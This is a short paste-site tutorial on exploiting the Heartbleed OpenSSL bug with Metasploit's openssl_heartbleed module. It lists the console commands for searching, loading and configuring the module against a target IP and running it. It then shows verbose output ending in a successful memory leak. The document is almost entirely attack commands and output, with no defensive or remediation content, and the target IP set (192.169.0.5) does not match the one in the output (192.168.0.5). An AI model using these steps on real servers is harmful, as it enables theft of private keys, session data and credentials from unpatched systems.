Exploiting Heartbleed Bug with Metasploit

SUBMITTED BY: sahertian

DATE: June 19, 2016, 9:08 p.m.

FORMAT: Text only

SIZE: 6.1 kB

Raw Download

HITS: 685

Report
  1. An simple tutorial how to exploit Heartbleed OpenSSL Bug using Metasploit
  3. ## Login to your Metasploit Framework
  5. root@kali:~#msfconsole
  7. ## Search the Heartbleed
  9. msf > search heartbleed
  11. Matching Modules
  12. ================
  14. Name Disclosure Date Rank Description
  15. ---- --------------- ---- -----------
  16. auxiliary/scanner/ssl/openssl_heartbleed 2014-04-07 normal OpenSSL Heartbeat (Heartbleed) Information Leak
  17. auxiliary/server/openssl_heartbeat_client_memory 2014-04-07 normal OpenSSL Heartbeat (Heartbleed) Client Memory Exposure
  19. ## Use the Heartbleed Auxiliary and run show options command
  21. msf > use auxiliary/scanner/ssl/openssl_heartbleed
  22. msf auxiliary(openssl_heartbleed) > show options
  24. Module options (auxiliary/scanner/ssl/openssl_heartbleed):
  26. Name Current Setting Required Description
  27. ---- --------------- -------- -----------
  28. DUMPFILTER no Pattern to filter leaked memory before storing
  29. MAX_KEYTRIES 50 yes Max tries to dump key
  30. RESPONSE_TIMEOUT 10 yes Number of seconds to wait for a server response
  31. RHOSTS yes The target address range or CIDR identifier
  32. RPORT 443 yes The target port
  33. STATUS_EVERY 5 yes How many retries until status
  34. THREADS 1 yes The number of concurrent threads
  35. TLS_CALLBACK None yes Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
  36. TLS_VERSION 1.0 yes TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)
  39. Auxiliary action:
  41. Name Description
  42. ---- -----------
  43. SCAN Check hosts for vulnerability
  45. ## Set the RHOSTS with your target IP
  47. msf auxiliary(openssl_heartbleed) > set RHOSTS 192.169.0.5
  48. RHOSTS => 192.169.0.5
  50. ## Set verbose mode true
  52. msf auxiliary(openssl_heartbleed) > set verbose true
  53. verbose => true
  55. ## Now exploit the target
  57. msf auxiliary(openssl_heartbleed) > exploit
  59. [*] 192.168.0.5:443 - Sending Client Hello...
  60. [*] 192.168.0.5:443 - SSL record #1:
  61. [*] 192.168.0.5:443 - Type: 22
  62. [*] 192.168.0.5:443 - Version: 0x0301
  63. [*] 192.168.0.5:443 - Length: 86
  64. [*] 192.168.0.5:443 - Handshake #1:
  65. [*] 192.168.0.5:443 - Length: 82
  66. [*] 192.168.0.5:443 - Type: Server Hello (2)
  67. [*] 192.168.0.5:443 - Server Hello Version: 0x0301
  68. [*] 192.168.0.5:443 - Server Hello random data: 57670028c2586feab7b89acb206737fb5a3c266668740367834100a7049f80c8
  69. [*] 192.168.0.5:443 - Server Hello Session ID length: 32
  70. [*] 192.168.0.5:443 - Server Hello Session ID: 34fd54aeab97d916e4b3fa0526dad8962efff7b19b22a15a94811d1730a08a94
  71. [*] 192.168.0.5:443 - SSL record #2:
  72. [*] 192.168.0.5:443 - Type: 22
  73. [*] 192.168.0.5:443 - Version: 0x0301
  74. [*] 192.168.0.5:443 - Length: 5329
  75. [*] 192.168.0.5:443 - Handshake #1:
  76. [*] 192.168.0.5:443 - Length: 5325
  77. [*] 192.168.0.5:443 - Type: Certificate Data (11)
  78. [*] 192.168.0.5:443 - Certificates length: 5322
  79. [*] 192.168.0.5:443 - Data length: 5325
  80. [*] 192.168.0.5:443 - Certificate #1:
  81. [*] 192.168.0.5:443 - Certificate #1: Length: 1893
  82. [*] 192.168.0.5:443 - Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0x000000055eb028>, issuer=#<OpenSSL::X509::Name:0x000000055eb050>, serial=#<OpenSSL::BN:0x000000055eb078>, not_before=2015-10-07 02:26:39 UTC, not_after=2017-10-02 02:36:38 UTC>
  83. [*] 192.168.0.5:443 - Certificate #2:
  84. [*] 192.168.0.5:443 - Certificate #2: Length: 1236
  85. [*] 192.168.0.5:443 - Certificate #2: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0x000000055c8898>, issuer=#<OpenSSL::X509::Name:0x000000055c8938>, serial=#<OpenSSL::BN:0x000000055c8a28>, not_before=2011-05-03 07:00:00 UTC, not_after=2031-05-03 07:00:00 UTC>
  86. [*] 192.168.0.5:443 - Certificate #3:
  87. [*] 192.168.0.5:443 - Certificate #3: Length: 1153
  88. [*] 192.168.0.5:443 - Certificate #3: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0x000000055a6cc0>, issuer=#<OpenSSL::X509::Name:0x000000055a6ce8>, serial=#<OpenSSL::BN:0x000000055a6d10>, not_before=2014-01-01 07:00:00 UTC, not_after=2031-05-30 07:00:00 UTC>
  89. [*] 192.168.0.5:443 - Certificate #4:
  90. [*] 192.168.0.5:443 - Certificate #4: Length: 1028
  91. [*] 192.168.0.5:443 - Certificate #4: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0x00000005589710>, issuer=#<OpenSSL::X509::Name:0x00000005589738>, serial=#<OpenSSL::BN:0x00000005589760>, not_before=2004-06-29 17:06:20 UTC, not_after=2034-06-29 17:06:20 UTC>
  92. [*] 192.168.0.5:443 - SSL record #3:
  93. [*] 192.168.0.5:443 - Type: 22
  94. [*] 192.168.0.5:443 - Version: 0x0301
  95. [*] 192.168.0.5:443 - Length: 331
  96. [*] 192.168.0.5:443 - Handshake #1:
  97. [*] 192.168.0.5:443 - Length: 327
  98. [*] 192.168.0.5:443 - Type: Server Key Exchange (12)
  99. [*] 192.168.0.5:443 - SSL record #4:
  100. [*] 192.168.0.5:443 - Type: 22
  101. [*] 192.168.0.5:443 - Version: 0x0301
  102. [*] 192.168.0.5:443 - Length: 4
  103. [*] 192.168.0.5:443 - Handshake #1:
  104. [*] 192.168.0.5:443 - Length: 0
  105. [*] 192.168.0.5:443 - Type: Server Hello Done (14)
  106. [*] 192.168.0.5:443 - Sending Heartbeat...
  107. [*] 192.168.0.5:443 - Heartbeat response, 65535 bytes
  108. [+] 192.168.0.5:443 - Heartbeat response with leak
  110. Thank you :)
comments powered by Disqus